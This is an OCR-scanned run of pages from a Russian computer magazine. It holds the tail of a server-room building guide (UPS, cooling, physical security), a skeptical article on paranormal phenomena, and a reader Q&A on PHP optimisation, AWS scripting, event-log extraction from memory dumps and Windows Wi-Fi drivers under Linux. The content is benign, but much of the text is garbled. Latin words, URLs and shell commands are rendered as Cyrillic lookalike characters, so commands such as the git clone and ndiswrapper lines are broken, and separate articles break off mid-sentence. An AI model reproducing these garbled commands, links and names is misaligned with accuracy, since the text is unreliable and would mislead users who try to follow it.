есть огромное желание сэкономить, то покупай ИБП мощностью от 2 
кВА — такое устройство обойдется не менее $300 (цена варьируется 
в зависимости от производителя) . ИБП от неизвестного китайского 
вендора обойдется чуть дороже $300, а устройство узнаваемой фирмы 
— от $400. Нормальный ИБП для сервера, на мой взгляд, это АРС 5тагі> 
ПРЗ КТ 5000ѴА и подобные ему. Цена такого устройства начинается от 
$2500. Дорого? Ая в самом начале статьи предупреждал, что построе- 
ние серверной — занятие дорогое. Зато этот ИБП прекрасно поместит- 
ся в серверную стойку. 

Кроме мощности для ИБП важна топология. Компании, специали- 
зирующиеся на недорогих моделях, утверждают, что для сервера 
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Рис. 6. Мой «серверный» 
ИБП, Мизіек РоѵѵегМизГ 
1000 оШпе 



будут оптимальны линейно- 
интерактивная топология 
(Ілпе-Іпіегасгіѵе ІІР5) и даже 
офлайн-топология (СЖ-Ілпе ІІР8). 
Причем не только утверждают, но 
еще и выпускают мощные модели 
Рис. 5. ИБП АРС 5тагМ1Р$ с линейно-интерактивной топо- 
КТ 5000ѴА, вид сзади логией. Зато компании, специали- 

зирующиеся на более дорогих и 

мощных моделях, для сервера рекомендуют только топологию онлайн 
(Оп-Ілпе ІІР5, ИБП непрерывного действия, тот же АРС БтагМІРБ КТ 
5000ѴА). 

Какая топология лучше? Конечно же, онлайн, но она и дороже. А все 
прекрасно понимают, что на практике нужно будет вписаться в опреде- 
ленный бюджет. С другой стороны, линейно-интерактивные ИБП по- 
стоянно совершенствуются, о чем свидетельствует появление на рынке 
мощных моделей ИБП с такой топологией, которые тоже стоят немало. 
Если ты не понимаешь, чем отличается одна топология ИБП от другой, 
рекомендую прочитать следующую статью: тэнси.рф /аггіс1е04.Ьі:т1 . 

Климатическая техника 

Нормальная температура для работы компьютеров — примерно 20 
градусов Цельсия. Но, сам понимаешь, такие условия встречаются 
далеко не всегда, особенно летом. А вот теперь начинается самое 
интересное. Многие из нас привыкли подбирать кондиционер по 
площади помещения, в котором он будет установлен. В данном случае 
это неправильно. Нужно рассчитать общую тепловую нагрузку, а затем 
подбирать кондиционер, соответствующий этому параметру. 

Тепловая мощность измеряется в БТЕ (Британская термическая 
единица), она же ВТО (ВгійзЬіЬегтаІипіі:). 1Вт примерно равен 3.412 
БТЕ/час. Например, пусть в помещении находится десять компьюте- 
ров, каждый из которых потребляет по 400 Вт. Рассчитаем тепловую 
мощность: 

10 х 400 х 3.412 = 13 648 БТЕ/час 

Помимо компьютеров источниками тепла являются сами пользова- 
тели и осветительные приборы. Пусть в помещении включено пять 
лампочек по 100 Вт каждая, рассчитаем тепловую мощность : 

5 х 100 х 3.412 = 1 706 БТЕ/час 

Один пользователь выделяет тепла на 300 БТЕ/час. Выходит, наши два- 
три администратора создадут нагрузку еще в 600-900 БТЕ/час. 
Осталось учесть тепловую нагрузку от окон, стен и потолка. Например, 





если у тебя солнечная сторона, то нагрузка от окон будет больше, чем 
на противоположной стороне здания. Если серверная находится на по- 
следнем этаже, то нагрузка будет происходить еще и от крыши, которая 
летом постоянно нагревается. Все это должен рассчитать специалист 
по установке кондиционера. Затем нужно добавить к полученному 
показателю свои значения, и останется сравнить общую тепловую 
нагрузку с эффективностью охлаждения кондиционера (параметр 
ЕЕК) , подробно об этом можно прочитать тут: еп.ѵѵікіребіа.огу/ѵѵікі/ 
Епег^у еШсіепсѵ гайо . 

Чуть ранее было сказано, что у некоторых серверных шкафов есть 
собственные сплит-системы, в этом случае тепловой нагрузкой от 
оборудования, установленного в шкаф, можно частично пренебречь. 
Но нужно учитывать тепловую нагрузку от самого шкафа — она 
будет меньше, чем от всего оборудования, но все же будет (задняя 
стенка холодильника ведь греется, хотя в самом холодильнике — 
холодно). 

Нормальная влажность для компьютерных систем — 30-55% (идеаль- 
ная — 40-50%) . Если влажность низкая, возникнут проблемы с электро- 
статическими зарядами. Если же влажность слишком высокая, влага 
будет конденсироваться на платах, что вызовет окисление контактов и 
замыкание. Бороться с высокой влажностью можно с помощью конди- 
ционеров с функцией осушения воздуха (такие сейчас — не редкость) . 
А вот если влажность низкая, подойдут увлажнители воздуха (самый 
дешевый стоит около 2 000 рублей) . Впрочем, можно найти кондицио- 
нер и с увлажнителем воздуха. А еще лучше, если кондиционер будет 
автоматически поддерживать необходимые температуру и влажность. 

Дополнительное оснащение 

Стойки, серверы — это еще не все. Серверную нужно защитить еще как 
минимум от двух факторов: несанкционированного проникновения 
и пожара. Для защиты от несанкционированного доступа желательно 
оснастить дверь в серверную приличным замком, в идеале — электрон- 
ным, чтобы фиксировались перемещения сотрудников из комнаты и в 
комнату. Круг сотрудников нужно ограничить — предоставить доступ 
не всем желающим, а только администраторам. Если решили сэконо- 
мить и установили обычный замок, то не забудьте один ключ выделить 
охране — на всякий случай. 

Стоимость видеокамер и видеосерверов может варьироваться в за- 
висимости от возможностей оборудования. Вполне возможно, что 
захочется установить видеонаблюдение не только за серверной, но и 
за всем офисом. Ознакомиться с необходимым оборудованием и при- 
мерными ценами можно на сайте компании Ахіз: ахіз.сот/ги/ргосіисЩ 
(это не реклама, просто я нашел на этом сайте весь необходимый 
ассортимент). 

Дорого? Да, можно поставить четырехканальный видеорегистратор 
наподобие АѴТесЬ КРБ-6702, прикупить четыре видеокамеры (хватит 
не только для серверной) , жесткий диск на 1 Гб и старый телевизор — 
всего этого достаточно для создания системы видеонаблюдения. Но это 
уже прошлый век. 

Вне зависимости от используемого замка в серверной нужно настроить 
камеру наблюдения, а при обработке особо важных данных — устано- 
вить сигнализацию и подключить ее к пульту охраны. 

Наличие пожарной сигнализации и огнетушителей — это обычные 
нормы безопасности. В серверной довольно много электрооборудо- 
вания (весьма дорогого), и никогда не знаешь, что может случиться. 
Наличие огнетушителей позволит персоналу потушить начавшийся 
пожар до того, как пожарная сигнализация затопит всю комнату (и 
тогда ущерб будет значительно выше, поскольку будет залито водой 
все, включая то, что даже и не горело) . 

Заключение 

Мы рассмотрели основные аспекты, касающиеся построения сервер- 
ной. Напоследок я рекомендую ознакомиться со стандартом ТІА (на 
моем сайте ты найдешь этот стандарт в переводе на русский и с иллю- 
страциями) , из которого можно почерпнуть много полезной информа- 
ции относительно построения серверной комнаты, т 
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■ ■ Оксана «Огіуапа» Андреева (огіуапаШхрзусЬо.ги) 




РЗѴСНО: 

ПОТАЕННЫЕ УГОЛКИ СВЕРХСОЗНАНИЯ 

Мифы и реалии паранормальных способностей человека. Истина где-то рядом. 

Признайся — наверняка ты не раз мечтал в школезапуститьучебник 
в голову одноклассника одной силой мысли или взглядом поджечь 
класс перед годовой контрольной по нелюбимому предмету? Значит, 
истории о паранормальныхявленияхтебезнакомы. Ноесли в дет- 
стве это было просто чем-то из разряда сказок, то сейчастебе, как 
истинномухакеру, должно быть интересно докопаться до сути: есть 
лив этих рассказах хоть капля правды или все— сплошной вымысел? 



Как бы скептически не были настроены мы с тобой, но довольно 
многие люди утверждают, что паранормальные явления - вполне 
естественны, хоть и проявляются редко. Итак, для начала давай 
определимся с терминологией. Как нам сообщает ѴѴікіресІіа, 
паранормальными явлениями являются феномены, существо- 
вание которых научно не доказано. При этом к ним относятся 
только те феномены, само существование которых не являет- 
ся достоверным. Явления, обоснования которых находятся за 
пределами современной научной картины, но существование не 
подлежит сомнению, паранормальными не являются. 

Таким образом, паранормальные явления — это нечто, что никто 
не видел, а те, кто якобы видел, не могут ни доказать это, ни 
каким-либо образом объяснить. Тем не менее, эти более чем 
эфемерные события не только веками будоражат сознание 
людей, но и обросли обширной теоретической базой. Например, 
существует целая классификация паранормальных способно- 
стей, которые подразделяются на ясновидение, экстрасенсорику, 
пирокинез, телекинез, телепортацию и даже такую трогательную 
«дисциплину» как длительное голодание. 

2 >чевидное? Невероятное? 
легксГневнятноеѴ. . 

Предлагаю ознакомиться с одной из историй, получивших в свое 
время широкую огласку и до сих пор передающихся из уст в 
уста любителями газеты «Жизнь» и сериала Х-Рііез. 

Итак, XXI век, Украина, поселок, относящийся к районному 
центру. Подросток-старшеклассник обвиняется в поджигании 
своего дома. Родители в отчаянии, он сам в шоке, уверяет, что 
не было даже мыслей о поджоге. Через некоторое время маль- 
чику вынуждены поверить, так как загорается белье в ванной 
или конфорки на кухне тогда, когда сам парень уже полтора часа 
сидит с родителями в комнате, онятно, что наука на сегодняш- 
ний день не может дать объяснения таким случаям, но за дело 



взялись так называемые «парапсихологи». Как гласит широко 
растиражированная в СМИ версия, парапсихологов пригласили 
жители деревни, соседи мальчика-поджигателя, поскольку нико- 
му не улыбалось жить рядом с ходячим файрболом. Несчастные 
родители, а также само юное дарование с радостью согласились 
на все предложенные опыты, лишь бы прекратить это мракобе- 
сие. В «лаборатории» (это цитата, что представляет собой лабо- 
ратория парапсихологов — можно только догадываться) у парня 
обнаружили сильный стресс, который, по его словам, длится уже 
несколько лет. Измерение биополя приборами (даже не спраши- 
вай, это снова цитата) продемонстрировало повышенные пока- 
затели электрических полей и энергетический потенциал выше 
среднего (каково?!). 

«Постоянный стресс привел к переизбытку энергии и электри- 
чества, а как следствие - к вызыванию огня, или спонтанные 
возгорания привели к стрессу?», - вопрошают парапсихологи. 
Вопрос оказался риторическим, какого-либо объяснения и, тем 
более, решения, парапсихологи не предложили. Так что ты, на 
всякий случай, не переутомляйся. Или держи рядом с кроватью 
огнетушитель. Существование данного феномена, конечно, не 
доказано, но ведь и не опровергнуто, так? 

Как стать экстрасенсом сломо- 
щью измерительных приборов 

Любопытно, что несмотря на то, что парапсихология наукой, 
конечно же, не считается, существует множество людей, причис- 
ляющих себя к ее адептам. В кругах «парапсихологов» популя- 
рен известный афоризм «Наука рождается там, где происходит 
что-то необъяснимое», видимо, понимаемый слишком бук- 
вально... При этом специалисты по изучению паранормальных 
явлений утверждают, что в своей работе они используют самые 
что ни на есть научные инструменты. Более того — ни в одной 
статье по парапсихологии ты не найдешь сообщений о том, что 
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какие-либо исследования прошли неуспешно. Наоборот, судя 
по описываемым экспериментам, большинство из них тянет как 
минимум на Нобелевскую премию. Чего стоит одно только изме- 
рение ауры человека! 

Давай снова обратимся к нашему понятийному аппарату: аура — 
это проявление души человека, которое обычно представляется 
как невидимый ореол, окружающий тело. В эзотерике счита- 
ется, что увидеть ауру может только человек со сверхчувстви- 
тельным восприятием (иначе говоря — экстрасенс). При этом 
современные парапсихологи трактуют ауру как «совокупность 
электрических, электромагнитных и тепловых полей» и активно 
практикуют ее измерение. Логично предположить, что получен- 
ные результаты, как и любые другие результаты измерений, воз- 
можно визуализировать. Таким образом, любой девятиклассник, 
хоть раз оформлявший лабораторную работу, фактически может 
претендовать на звание экстрасенса. Но это, конечно, читер- 
ство, ведь с точки зрения парапсихологии настоящий экстрасенс 
может и должен чувствовать биополе не при помощи какого- 
либо стаффа, а исключительно посредством собственных рук. 

И это касается не только людей, но и всего окружающего — в 
том числе, например, домов. Так, экстрасенс, входя в здание, 
может определить, хорошая у него аура или плохая — прине- 
сет ли пребывание в этом помещении радостное настроение 



и высокую работоспособность или способно вызвать уныние и 
плохое самочувствие. 

И надо сказать, что эти утверждения, отдающие, на первый 
взгляд, каким-то мистицизмом, на самом деле не лишены логи- 
ки. Если отбросить «ритуальную» составляющую, то разве не 
испытываем мы все то же самое? Наверняка ты замечал, что 
проходя мимо кинотеатра, где не раз был с любимой девушкой, 
или мимо бара, где традиционно проходят сейшны с друзьями, 
мы начинаем улыбаться, предаемся приятным мыслям. У этих 
мест «хорошая аура». 

А как мы чувствуем себя, например, находясь возле онкоцентра? 
Испытываем ощущение беспокойства, поскольку подсознатель- 
но ассоциируем объект с болью, горем, хотя сами — здоровы, 
и вообще идем совершенно не туда. В той или иной степени 
это чувствуют все, просто кто-то — слабее (так что даже сам не 
замечает), а кто-то — очень остро (такие люди могут, например, 
заплакать, проходя мимо детской больницы или впас ть в бла- 
гостное настроение, увидев купола церкви). 

Классификация 

паранормальных способностей 

Как уже было сказано выше, теория паранормальных явлений не 
только имеет множество последователей, но и включает в себя 
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значительное количество подразделов. Предлагаю ознакомиться 
с каждым из них — уверяю тебя, это весьма любопытно. 

> Полтергейст 

Полтергейстом принято называть необъяснимые явления, харак- 
теризующиеся шумом, стуками, самопроизвольным движением 
предметов, неожиданными и необъяснимыми возгораниями и 
так далее. Необычный термин образован от немецких роІТегп — 
«шуметь», «громыхать» и Ѳеізі — «дух». Именно этим (шумным 
поведением расшалившихся духов) и объясняют полтергейст 
приверженцы теории существования паранормальных явлений. 
Научного же объяснения, как ты понимаешь, не существует - 
иначе описываемые явления не имели бы статус паранормаль- 
ных. 

Интересный факт: считается, что полтергейст (в отличие от, 
например, привидений) привязан не к месту, а к человеку, так 
что если тебе вдруг покажется, что мебель перемещается, а изо 
всех углов раздаются посторонние звуки - переезд не поможет. 
Лучше уточни, не мыла ли мама пол за диваном, и не начал ли 
сосед ремонт. Но если тебе интересно, как сей факт трактуют 
парапсихологи - изволь. 

Итак, люди, занимающиеся исследованием полтергейста, счи- 
тают, что данное паранормальное явление чаще всего «сопро- 
вождает» подростков в пубертатный период. В период полового 
созревания (равно как и у женщин во время беременности) у 
человека отмечается повышение энергопотенциала - «природа 
дает авансом ресурсы» для рождения нового человека (в случае 
беременных) и для рождения новой зрелой личности (в случае с 
подростками). Мы склонны объяснять подобные энергоподъемы 
(которые, кстати, случаются в описанных ситуациях далеко не 
всегда, бывает и совершенно наоборот) гормональными про- 
цессами, ну да ладно. С точки зрения психоэнергетики, любая 
энергия (как положительная, как и отрицательная) должна выво- 
диться, иначе, накапливаясь в энергетическом поле человека, 
она приводит к стрессам. Кто-то выводит излишки энергии, 
занимаясь спортом, кто-то разряжается на более слабых, у кого- 
то случаются эмоциональные срывы... А кто-то, у кого скопление 
достигает критического уровня, бессознательно швыряет кресло 
в потолок или поджигает обои в комнате (помнишь горячего 
парня с Украины, о котором шла речь выше?). Парапсихологи 
утверждают, что проведя работу с такими людьми, можно помочь 
им контролировать уничтожающее воздействие на окружающий 
мир - трансформировать свою отрицательную энергию в поло- 
жительную и направить ее в мирное русло — например, исце- 
лять людей (конечно, для этого человек должен хорошо владеть 
собой и иметь сильное желание помогать другим). Но наш тебе 
совет: хочешь кого-то исцелить - получи медицинское образо- 
вание, а если пять видов химии тебя пугают - не шути с огнем и 
расходуй излишки своей энергии на что-либо конструктивное. 
Например, запишись в спортзал или попробуй еще раз пройти 
хак-квест, улучшив свой предыдущий результат. 

> Телекинез (психокинез) 

Телекинезом называется воздействие на физические объекты 
одним лишь усилием мысли, без применения какой-либо физи- 
ческой силы. Пожалуй, это самое известное широким массам 
паранормальное явление - в основном за счет популярности 
имитирующих телекинез фокусов: в арсенале почти каждого «вол- 
шебника», выступающего на утренниках и корпоративах, имеется 
трюк со сдвиганием чашки, стоящей на расстоянии нескольких 
метров, или «неуправляемо» ездящими по залу стульями. 
Впрочем, известны мастера, чьи умения значительно превос- 
ходили простые методы с привязанной к предмету тонкой про- 
волокой. Например, секрет известной телекинезистки Нинель 
Кулагиной не разгадан до сих пор. Кулагина могла перемещать 



либо вращать небольшие предметы, вызвать ожог кожи другого 
человека одним своим прикосновением, выбрать из кучи оди- 
наковых мелких предметов один помеченный, рассеивать луч 
лазера ладонью и прочее. Разумеется, таких людей немного, 
и они представляют несомненный интерес не только для пре- 
клоняющихся перед «продвинутыми» парапсихологов, но и для 
науки. Например, «фокусы» той же Нинель Кулагиной изучали 
несколько десятков ученых. Известны некоторые результаты 
проведенных при участии Кулагиной лабораторных опытов: во 
время ее «работы» аппараты отмечали изменение электриче- 
ских показателей головного мозга и повышение пульса до 240 
ударов в минуту (но это может быть объяснено обычным стрес- 
сом в результате сильного эмоционального напряжения), а также 
сильное электрическое поле и короткие ультразвуковые импуль- 
сы, образовывавшиеся вокруг рук женщины (а вот этому уже 
найти объяснение не удалось). 

Что касается версии парапсихологов, то они уверены в том, что 
все происходило благодаря усилию мысли. «Мысль - это тоже 
энергия», - утверждает парапсихология. Что ж, в каком-то смыс- 
ле они правы - и если так, то ][ является отличным источником 
энергии :) Интересный видеоролик на тему телекинеза: ЫТр://ЬІТ 
ІѵЛеІекіпег . 

> Пирокинез 

Пирокинез — это то, чем занимался легендарный мальчик, о 
котором мы вспомнили в самом начале, а именно - способность 
воспламенять предметы при контакте с ними, но без исполь- 
зования каких-либо вспомогательных средств, или вообще на 
расстоянии. Описаний подобных примеров можно найти немало, 
но ни один из них, как ты догадываешься, не имеет научного 
обоснования. Один из самых известных случаев - так называе- 
мый «феномен Андервуда», который имел место в США в 1927 
году. Доктор Леонард Вудман опубликовал в специализирован- 
ном медицинском издании МісЬідап Мебісаі статью, описываю- 
щую случай его пациента, некого молодого человека по фамилии 
Андервуд, который страдал от «огненного дыхания», вследствие 
чего был вынужден дышать крайне осторожно, чтобы не вызвать 
пожар. «Человек-огнемет» был подвергнут различным экспери- 
ментам: в присутствии нескольких медиков он дышал на различ- 
ные легковоспламеняемые предметы (хлопковый платок, сухие 
листья, бумага), и в результате они начинали тлеть, а затем 
воспламенялись, перед экспериментом испытуемый раздевался 
догола, чтобы не иметь возможности спрятать, например, спички 
в рукаве, а также тщательно полоскал рот, но результаты оста- 
вались стабильно положительными. Ученые, участвовавшие в 
испытаниях, не смогли дать какое-либо объяснение феномену, 
хотя некоторые их современные коллеги пытаются предложить 
такую версию: при интенсивном дыхании происходит концен- 
трация поля (энергии) на определенной зоне предмета, вызывая 
резкое повышение температуры до высоких градусов, достаточ- 
ных для воспламенения. Впрочем, такое объяснение не нашло 
пока широкой поддержки, и это логично. Наше мнение: опаса- 
ешься огня и дыма изо рта - лучше брось курить. 

Но, тем не менее, существуют и вполне объяснимые случаи воз- 
горания, причем, что даже более страшно - самовозгорания. 
Известен, например, ряд прецедентов, когда неожиданно и без 
всякого видимого воздействия на глазах множества свидетелей 
вспыхивали одежда и обувь ничего не подозревавшего чело- 
века. Причина была проста - пострадавшие работали на поле, 
и одежда пропиталась распыляемыми удобрениями, в состав 
которых входили горючие вещества. Возникшее при ходьбе тре- 
ние и вызвало возгорание, хотя со стороны процесс выглядел, 
конечно, более чем загадочно. Такие случаи, как ты понимаешь, 
во многом способствуют распространению легенд о неконтро- 
лируемых выбросах огня и так далее. Кстати, среди них есть и 
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довольно забавные, например: «человек продал душу дьяволу, а 
потом не придерживался условий договора и за это был наказан 
испепелением» или «самовозгораются алкоголики, поскольку 
их организм сильно пропитан спиртом». Не вступай в сомни- 
тельные сделки, не злоупотребляй алкоголем и не верь всему, 
что говорят, а главное - соблюдай технику противопожарной 
безопасности. 

> Экстрасенсорика 

Экстрасенсорика так и переводится с латыни — сверхчувствитель- 
ность (ехіга — «сверх», зепзиз — «чувство»). Причем ее обычно 
делят на три направления: яснознание (способность видеть собы- 
тия прошлого), целительство (способность энергетически воздей- 
ствовать на людей или животных, в том числе исцелять болезни, 
причины которых не ясны), ясновидение (способность предвидеть 
будущее). Любопытно трактуют потенциальную возможность нали- 
чия такого дара в парапсихологии. У каждого человека есть свое 
энергоинформационное поле, которое состоит из накопленных 
знаний, опыта, мировоззрения, эмоций и так далее. Точно такое 
же поле есть и у планеты, поскольку она тоже в своем роде живой 
объект. Поле планеты Земля можно сравнить с интернетом (отлич- 
ный способо объяснить что-то из парапсихологии хакеру!), а спо- 
собность к такого рода феноменам — к каналу, который подключа- 
ет нас к интернету: у кого-то этот канал узкий, у кого-то — широ- 
кий, у кого-то его вообще нет. Подключаясь к этому полю, можно 
предвидеть будущие катаклизмы (мы еще не знаем о надвигаю- 
щемся цунами, а оно уже где-то там начинается, и на энергоин- 
формационном уровне есть эти данные), видеть уже прошедшие 
события (они ведь никуда из «архива» энергоинформационного 
поля не делись) и оказывать воздействие на людей, получая из 
ЗИП информацию о, например, болезни, которая еще не проявила 
себя. Сам понимаешь, ни традиционная, ни даже народная меди- 



цина (все же лечение травяными настоями и свежим воздухом 
далеки от «получения данных из энергоинформационного поля») 
подобную теорию не признают, равно как и ни одна из областей 
науки. И с этой ситуацией сложно спорить. При этом даром сверх- 
чувствования, вообще-то, обладает почти каждый, и это не что 
иное как интуиция, а именно — бессознательный анализ проис- 
ходящего на основании врожденных инстинктов, своего личного 
опыта, знаний в различных сферах жизни (чувствуешь схожесть с 
определением энергоинформационного поля?) и так далее. 
Вспомни, наверняка в твоей жизни были ситуации, когда ты упорно 
не хотел что-либо делать (на первый взгляд, совершенно необо- 
снованно!) или, наоборот, делал что-то, казалось бы, парадоксаль- 
ное, и оказывался прав! Что это было? Правда же, возникало ощу- 
щение паранормальности происходящего, практически чуда? Ты 
почему-то задержался у входа в подъезд, а через пару секунд там 
возникла драка, и ты бы точно пострадал. Вытянул билет на экза- 
мене наугад, но именно эту тему ты знал лучше всего! Мистика? 
Отнюдь нет. В первом случае ты услышал подозрительные звуки, 
которые донеслись из подъезда, но, будучи занят, скажем, поис- 
ками ключей, не придал им осознанного значения, зато твой мозг 
мгновенно проанализировал ситуацию и подал сигнал «Стоп!». На 
экзамене в течение доли секунды мелькнул меред твоими глазами 
уголок билета со знакомым заголовком - глаз не успел «запом- 
нить», но мозг уже сделал соответствующие выводы. В общем, не 
даром Национальный научный фонд США относит экстрасенсорные 
возможности к одному из наиболее распространенных псевдонауч- 
ных заблуждений. 

Р.5. Во время написания раздела «полтергейст» мой компью- 
тер трижды самопроизвольно перезагружался, а файл с текстом 
начал прыгать вверх-вниз, как будто кто-то двигал полосу прокрут- 
ки, хотя мои руки в этот момент находились на клавиатуре, т 
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Есть вопросы — присылай 
на іад@геаІ.хакер.ги 



О: Я устроился на работу в компанию, 
основной проект которой разрабаты- 
вается на РНР. Одна из поставленных 
задач — оптимизировать производи- 
тельность приложения. Система за не- 
сколько лет сильно разрослась и теперь 
заметно подтормаживает. Понятно, 
что многие участки кода легко мож- 
но оптимизировать, возможно даже 
переписать заново. Но это непростая и 
ресурсоемкая затея. С чего бы начали в 
такой ситуации вы? 

А: Без серьезного рефакторинга кода здесь, 
конечно, не обойтись. Стандартная прак- 
тика, которой пользуются разработчики 
больших приложений, заключается в пере- 
носе ресурсоемкихучастков кода на С++. 
Функционал оформляется в виде модулей, 
которые далее подключаются к РНР. Но есть 
и альтернативные пути. Например, в недрах 
РасеЬоок’а был разработан замечательный 
инструмент НірНор ^ог РНР ( ііІбиЬ.сот/ 
ІасеЬоок/ЫрЬор-рбр ). который трансфор- 
мирует исходник на РНР в хорошо оптими- 
зированный код на С++ и компилируетего 
с помощью д++ в бинарные файлы. Таким 
образом удается программировать на чистом 
РНР, но при этом НірНор будет выполнять 
код значительно эффективнее. Прирост до- 
стигается не только за счет компиляции кода 
(сам РНР — интерпретируемый язык), но и 
благодаря ряду серьезных оптимизаций, 
в том числе отказа от «дорогих» операций 



вроде еѵаК). РасеЬоокзаявляетоб уменьше- 
нии нагрузки на СРІІ до 50% (в сравнении с 
Арасбе и РНР при обработке одного и того 
же объема трафика). Разработка появилась в 
публичном доступе в начале 2010 года и сей- 
час стремительно набирает популярность. 
Это легко понять: если компании приходится 
переносить часть кода на С/С++, то это не- 
пременно влечетза собой необходимость в 
соответствующих программистах. При этом 
количество людей, которые могут работать со 
всем кодом проекта, уменьшается. Попро- 
бовать в действии НірНор проще простого, 
исходники и инструкции по сборке открыто 
доступны В діѣ: 

§І1: сіопе §і1:://§і1:биЬ.сот/-РасеЬоок/ 

ИірИор-рИр. §11: 

Для использованиятебе понадобится РНР 
5.2 (в скором времени будет поддержка 5.3) и 
любая система на базе Біпих. 

О: В одной из колонок редактора ты 
рассказывал, как с помощью Атагоп 
ѴѴеЬ Бегѵісез легко можно организо- 
вать кластер из нескольких серверов, 
который бы включался по требованию 
и выполнял ресурсоемкие задачи 
вроде брутфорса. Для меня сейчас 
интересен вопрос автоматизации. 
Понятно, что для своих облачных 
сервисов Атагоп предоставляет до- 



кументированный АРІ, но как начать 
использовать технологии макси- 
мально быстро, не вникая в систему 
сложных вызовов? 

А: На самом деле, ничего сложного в АРІ 
Атагоп’овскихсервисов нет. Разработчи- 
кам доступны нетолько подробные описа- 
ния, но еще и гора примеров. Для технологии 
53, позволяющей хостить любые объемы 
данных при любой нагрузке, есть удобней- 
ший РЕ5Т АРІ. Для сервиса ЕС2, с помо- 
щью которого можно в считанные секунды 
поднять сколько угодно серверов, предо- 
ставляется довольно простой Оиегу АРІ для 
ЕС2. Если хочешь использовать все, даже 
самыетонкие настройки, то работать лучше 
всего именно с оригинальным АРІ. Если же 
критично время разработки, то задачу можно 
упроститьс помощью привязокдля разных 
языков программирования. Я говорю о моду- 
лях, скрывающих большую часть общения с 
АРІ и предоставляющих понятные и простые 
функции для работы с сервисами Атагоп. 

Я использовал замечательный пакет Воіо 
( собе.доодІе.сот/р/ЬоІю ). Текущая версия 
проекта — 2.0Ье1а4, поддерживающая все 
технологии АѴѴ5 (Атагоп ѴѴеЬ Зегѵісез), в 
том числе недавно появившийся облачный 
БІ\І5-сервис РоиІебЗ и технологию для 
организации массовых рассылок Атагоп 
Зітріе Етаіі Зегѵісе. Написать скрипт, 
который управлял бы работой облачных 
ресурсов, можно уже через десять минут 
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Арріу СІеатАІІ ВяЬизЬ Ѵівуѵ | 

Создаем статические записи в АВР-таблице с помощью утилиты 



АКРРгеегегІЧ© 

после знакомства с этим модулем, настолько 
все прозрачно. На сайте ЬоІо.сІоисІЬаскегз. 
сот представлена подробная документация 
и примеры. 

О: Можно ли извлечь журнал событий 
винды (ѴѴіпсІоѵѵз Еѵепі Іод) из имеюще- 
гося в наличие дампа памяти? 

А: Если ты читал статью «Анализатор памяти 
офлайн» из прошлого номера, то должен 
быть знаком с программами Метогуіе 
( тапбіапІ.сот/ргобисІзЛгее зоііѵѵаге/ 
тетогуге ) и Ѵоіаіііііу [ ѵоіабіезузіетз.сот/ 
беіаии/ѵоіабіііу ). Любая из них справится с 
поставленной задачей. В случае с Метогуге 
алгоритм следующий: 

1. Запускаем Аибііѵіеѵѵегдля выполнения 
анализа дампа памяти. По сути, нам не- 
обходимо получить информацию о запу- 
щенных процессах. Поэтому в настройках 
анализа достаточно выбратьтолько «Ргосезз 
Епитегабоп» и «Метогу зесбопз». 

2. Кактолько появятся результаты, выбираем 
в списке процессов зегѵісез.ехе, а в правой 
панели — вкладку «Метогу Зесбопз». Ниже 
отобразятся записи, ссылающиеся на лог- 
файлы. 

3. Теперь вызываем контекстное меню для 
процесса зегѵісез.ехе в левой панели и выби- 
раем в нем пункт«Асциіге Ргосезз». В папке, 
куда экспортируются результаты, появятся 

файлы типа « 8узІетМетогу%5с0х### 

#####-########.ѴА0». Это и есть логи 
ѴѴіпсІоѵѵз, в которых зафиксированы различ- 
ные системные события. 

4. Удобно проанализировать журнал событий 
с другого компьютера позволяетутилита 
Еѵепі І_од Ехріогег ( еѵепЦодхр.сот ) или бес- 
платный РегІ-скриптеѵІѴіеѵѵег ( гоигсеіюгде. 
іе1:/рго]ес1:5/еѵ1:ѵіеѵѵег ). Расширение файлов 
слогами необходимо предварительно по- 
менять на .еѵі. 



О: На новый ноутбук в качестве основ- 
ной системы был выбран Ыпих. Уста- 
новились драйвера на все устройства, 
кроме беспроводной карты. Но что ты 
думаешь: нигде в Сети дров под Ыпих 
я не нашел. Может быть, есть какие-то 
универсальные варианты? 

А: Несмотря нато, что современные дис- 
трибутивы ту кса стараются поддерживать все 
актуальное железо, по-прежнему встречаются 
ситуации, когда после установки не хватает 
драйвера для того или иного устройства. В 
твоей ситуации можно попробоватьхитрый 
трик: пустить в ход драйверы для... ѴѴіпсІоѵѵз! 
Да-да, именно виндовые дрова, какбы 
странно это ни звучало. Какэто возможно? 
Благодаря утилите ІЧсІізѵѵгаррег ( псПгѵѵгаррег. 
зоигсеЬгде.пе ). По сути, это реализация 
АРІ-вызовов ядра ѴѴіпсІоѵѵз и (какпонятно из 
названия) АРІ спецификации N015 (ІЧеІѵѵогк 
ОгіѵегІпІегІ'асеЗресібсабоЫдля ядра Ыпих. 
Таким образом, удается виндовый драйвер 
заставить выполняться под Ыпих’ом нативно, 
как если бы он выполнялся под виндой, при- 
чем без какой-либо бинарной эмуляции. С по- 
мощью N6 ізѵѵгаррег заработают большинство 
встроенных, РСМСІА и 115В беспроводных 
адаптеров и многихдругихустройств. Чтобы 
не гадать и делать все наверняка, рекомен- 
дую набрать в системе команду Ізрсі -пп (для 
РСІ-устройства) или ІзизЬ (для ІІ5В-девайса), 
чтобы получить идентификатор устройства 
и поискать его в списке поддерживаемых 
адаптеров, доступном на официальном сайте. 
Скорее всего, он в этом списке окажется. Как 
показываетопыт, лучше всего использовать 
драйвера для 32-битной ѴѴіпсІоѵѵз ХР. Они рас- 
пространяются в разных контейнерах, но будь- 
то , 2 Ір, .саб или .ехе, необходимо архиватором 
извлечь непосредственно файлы драйвера 
(все файлы с расширениями *.іпб *.зуз, *.Ьіп). 
После этого можно приступать кустановке 



виндового драйвера подтуксом следующей 
командой: 

псІІ5ыгарреп -і сігіѵѳг.іітР 

Далее проверяем, подошел ли драйвер: 

псІІ5ыгарреп -1 

Если ответ будет«бгіѵегргезеп1:, Ьагбѵѵаге 
ргезепі» — значит, все окей. Загружаем 
модуль ІЧсІізѵѵгаррег: 

тосІргоЬе ІМсІІБМгаррег 

Если все заработает, то в системе появится 
новое беспроводное устройство ѵѵіапб, кото- 
рое™ можешь отконфигурировать с помо- 
щью утилит іѵѵсопбід/ѵѵра_зи ррііса пі; и начать 
работать с ним. Такой вот приятный фокус. 

О: Недавно увидел, как пользователи 
МасВоокЧ>в ловко управляют приложе- 
ниями (вращают, перемещают, зумят и 
так далее) при помощи тачпада. Можно 
ли сделать такое на Ыпих? 

А: Сделать та кое возможно, так как ядро 
Ыпих начиная с версии 2.6.30 поддерживает 
тиШіоисб. Все, что потребуется, — это под- 
ходящее ПО, которое позволяло бы исполь- 
зовать наконец возможности тачпада на всю 
катушку. Тут нельзя не попробовать утилиту 
